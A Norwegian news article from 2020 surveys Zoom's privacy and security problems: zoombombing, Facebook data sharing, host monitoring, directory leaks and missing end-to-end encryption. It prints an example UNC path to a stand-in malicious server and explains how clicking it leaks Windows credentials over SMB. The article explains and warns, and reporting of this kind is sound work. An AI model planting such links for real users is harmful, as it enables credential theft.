Bruken av videosamtaler har virkelig tatt av denne våren, på grunn av nødvendigheten for sosial distansering, og blant tjenestene som har opplevd sterk vekst, er Zoom. Det har ført til at Zoom Video Communications, som selskapet bak tjenesten heter, har gjort det svært godt på børsen i en tid hvor børsene verden over har stupt.
Men nå har personvernet i Zoom-tjenesten begynt å vekke bekymring, blant annet hos amerikanske myndigheter. Statsadvokaten i New York har ifølge New York Times innledet en granskning.
«Zoombombing» og Facebook-lekkasje
Det dreier seg om flere forhold. En ting er at mange opplever at de offentlige Zoom-kanalene de bruker blir invadert av uvedkommende som viser fram uønsket innhold, noe som blir kalt for «zoombombing».
To nulldagssårbarheter funnet i Zoom-programvare
Selskapet har flere ganger de siste ukene måttet endre tjenesten på grunn av rapporter fra bekymrede brukere. Blant annet har den i det skjulte delt data med Facebook, noe Zoom Video Communications ikke skal ha vært klar over selv. Dette ble rettet i forrige uke, men ikke tidsnok til at selskapet har unngått søksmål.
Personvernpolicyen
I forrige uke kom amerikanske Consumer Report med en artikkel om personvernpolicyen til Zoom. I etterkant har policyen blitt endret, men fram til fredag i forrige uke ga den selskapet rett til å samle inn, lagre og dele persondata med tredjeparter.
Dette inkluderte også innhold i opptak lagret i nettskyen, lynmeldinger, filer, virtuelle tavler og annet som deles under bruken av tjenesten. Heller ikke videoer og transkribering av disse, var unntatt.
Opptak og overvåkning
Et annet punkt som blir tatt opp, er at den som er vert for samtalene i større grad enn andre kan overvåke deltakerne i en samtale ved hjelp av innebygd funksjonalitet, blant annet å se om andre brukere har Zoom-vinduet eller -appen i fokus på sin enhet. Det skal ikke være noe som viser andre deltakere at dette er aktivert.
Musk nekter alle ansatte å bruke Zoom
Zoom har også en opptaksfunksjon av samtalene som i alle fall møteverten kan benytte, uten at det kreves noe eksplisitt samtykke fra de øvrige deltakerne. Riktignok vises det hos de øvrige deltakerne en liten rød knapp hos de øvrige deltakerne når opptak pågår, men den anses som lett å overse.
Nå er det uansett ikke noe problem å gjøre opptak av videosamtaler også uten den innebygde funksjonaliteten. Det finnes egen programvare, for eksempel OBS Studio, og smartmobiler og nettbrett har i stor grad slik funksjonalitet innebygd.
Uønsket listing av brukere
I går ble nok et problem omtalt. Kontaktregisterfunksjonen i Zoom fungerer slik at den lister opp alle brukerne som tilhører samme virksomhet. Dette kan være nyttig for virksomheter, men den er basert på domenenavnet i brukernes e-postadresser. Det benyttes en svarteliste med domener som ikke skal støttes, inkludert e-posttjenester som gmail.com og hotmail.com, men en svarteliste vil aldri være komplett.
Optisk lagring: Forskere melder om gjennombrudd
Dermed har enkelte brukere opplevd at de har kunne se opptil tusen andre og ukjente brukere under «Company Directory»-delen av tjenesten. Dette inkluderer navn, e-postadresse og bilde. Samtlige skal ha registrert seg med e-postkonto fra nederlandske e-posttjenester som xs4all.nl, dds.nl og quicknet.nl, skriver Vice, som blant annet viser til twittermeldingen nedenfor.
@zoom_us I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional? #GDPR pic.twitter.com/bw5xZIGtSE
— Jeroen J.V Lebon (@JJVLebon) March 23, 2020
En talsperson for Zoom forteller til Vice at de nevnte domene er lagt i svartelisten, og at man kan be om at det samme gjøres med andre domener via dette skjemaet.
Windows-angrep
I natt ble det kjent at ondsinnede relativt enkelt kan få tilgang til det hashede Windows-passordet til brukere av Zoom-klienten for Windows. En slik hash kan ofte knekkes på sekunder på en PC med kraftig grafikkort.
Det hele gjøres ved å lokke andre brukere til å klikke på lenker som Zoom generer dersom en bruker sender brukerne en UNC-filbane (Universal Naming Convention) som peker til en ondsinnet server, slik som denne:
\\ondsinnet.server.no\bilder\katt.jpg
Ny satsing: Nå skal OpenAI bygge fremtidens roboter
Zoom-klienten gjør om dette til en klikkbar lenke, og når brukeren klikker på den, vil Windows forsøke å logge seg på serveren ved å bruke fildelingsprotokollen Server Message Block (SMB), og da i utgangspunktet med brukerens Windows-brukernavn og -passord. Som twittermeldingen viser nedenfor, lar dette seg fange opp på serversiden.
Hi @zoom_us & @NCSC - here is an example of exploiting the Zoom Windows client using UNC path injection to expose credentials for use in SMBRelay attacks. The screen shot below shows an example UNC path link and the credentials being exposed (redacted). pic.twitter.com/gjWXas7TMO
— Hacker Fantastic (@hackerfantastic) March 31, 2020
Likevel ikke ende-til-ende-kryptert
Zoom brukes i mange sammenhenger, også i tilfeller hvor det deles følsom eller fortrolig informasjon, for eksempel kabinettmøter i Storbritannia:
This morning I chaired the first ever digital Cabinet.
Our message to the public is: stay at home, protect the NHS, save lives. #StayHomeSaveLives pic.twitter.com/pgeRc3FHIp
— Boris Johnson #StayHomeSaveLives (@BorisJohnson) March 31, 2020
I slike sammenhenger er det selvfølgelig viktig at samtalene ikke kan avlyttes. Dette forutsetter at alt ende-til-ende-krypteres, noe som vil si at det kun er deltakerne i samtalene kan få tilgang til det som blir sagt.
The Intercept kom i går med en artikkel hvor det pekes på at videosamtalene i Zoom ikke er ende-til-ende-kryptert (E2E), selv om det fort kan tolkes slik av deler av informasjonen tjenesten oppgir på eget sitt eget nettsted, samt i dette dokumentet. I det sistnevnte står det blant annet spesifikt at møteverten kan aktivere E2E-kryptering før møtet starter.
Det viser seg at dette ikke stemmer, i alle fall når det gjelder tale- og videosamtaler, noe en talsperson for selskapet innrømmer overfor The Intercept:
Google innrømmer «pinlige» feil
– Per nå er det ikke mulig å aktivere E2E-kryptering for Zoom-videomøter. Zoom-videomøter bruker en kombinasjons av TCP og UDP. TCP-forbindelser bruker TLS, og UDP-forbindelser er kryptert med AES, ved å bruke en nøkkel som er forhandlet fram over en TLS-forbindelse, forteller talspersonen.
TCP og UDP er nettverksprotokoller. TLS og AES er krypteringsteknologier.
I praksis har dette mye felles med slik vanlige nettsteder krypterer webtrafikk. Trafikken er kun kryptert mellom brukerens nettleser og webserveren. Selv om Zoom Video Communications hevder at selskapet kun tar vare på brukerrelaterte data som er nødvendige for å tilby tjenesten, så er det på grunn av den manglende ende-til-ende-krypteringen mulig for selskapet å lagre samtalene. Dette fordi trafikken dekrypteres på selskapets servere før den sendes videre til de andre deltakerne i samtalene. Det gjør at selskapet kan bli presset til å levere ut dette til myndighetene.
Konkurransefordeler
Det er mange slike tjenester som ikke er ende-til-ende-krypterte, for eksempel Google Hangouts. Forskjellen er at de andre i stor grad er tydelige på at de ikke støtter dette.
– Dersom Zoom hevdet at de har ende-til-ende-kryptering, men ikke faktisk investerte i ressursene for å implementere det, og Google Hangout ikke kom med en slik påstand, og at du derfor valgte Zoom, så er ikke bare du som forbruker skadelidende, men også Hangouts fordi Zoom kommer med påstander om produktet sitt som ikke er sanne, sier Ashkan Soltani til The Intercept.
Soltani var tidligere sjefteknolog i amerikanske Federal Trade Commission (FTC), som har ansvar for forbrukervern og konkurranseregulering på føderalt nivå i USA.
Ekstrem vekst for konkurrent
Nå virker det ikke som at Google har noen større problemer med å skaffe seg brukere til selskapets videokonferansetjenester.
I et blogginnlegg opplyser selskapet at videokonferansetjenesten Google Hangouts Meet de siste ukene har hatt en daglig vekst på mer enn 60 prosent, og at den daglige bruken nå er 25 ganger høyere enn i januar.
X' nye API-grep skapte problemer under jordskjelvet i Japan
